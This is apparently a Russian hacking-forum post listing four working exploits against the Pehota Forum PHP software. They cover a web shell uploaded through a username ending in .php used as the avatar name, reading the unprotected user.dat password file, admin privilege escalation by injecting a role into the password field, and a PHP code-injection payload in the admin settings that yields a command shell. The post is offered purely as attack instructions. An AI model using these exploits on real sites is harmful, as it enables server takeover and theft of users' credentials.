Pehota Forum 1.05 и Pehota_Forum v1.10b

Скачать можно здесь: http://www.woweb.ru/load/56-1-0-4272

---------------------------------------------------------------------

1. Заливка шелла:

Регимся на форуме с ником blabla.php, вообщем так что бы ник (логин) заканчивался на .php

Предположим shell.php

Теперь заходим под этим логином, после чего идём в профиль выбираем загрузку аватары и заливаем шелл, всё шелл доступен по адресу:

http://site.ru/forum/user/shell.php/avator_shell.php

т.е. имя аватары формируется из avator_ + имя пользователя.

2. Проверялось на версии Pehota_Forum v1.10b - возможность узнать логины и пароли пользователей.

Из-за отсутствия .htaccess в "стандартном комплекте", можно просматривать файлы, файл с паролями:

http://test.ru/data/user.dat

3. Проверялось на версии Pehota_Forum v1.10b - повышение привилегий до админских.

Регимся

В поле Имя вводим login -вообщем тут не важно что
В поле Пароль (ну и в подтверждение пароля) вводим pass,2,3,Admin,
В поле с мылом вводим 123@123.ru - вообщем то что выглядит как нормальный адрес.

Получаем аккаунт: login:pass с админскими правами.

4. Проверялось на версии Pehota_Forum v1.10b - заливка шелла через админку

В админке - Настройки

Либо в поле Тем на страницу в admin.php:Ю либо в поле Тем на главную страницу: вписываем:

10"; system($HTTP_GET_VARS['cmd']); $aaaaa="

Получаем шелл:

http://test.ru/params.php?cmd=[cmd]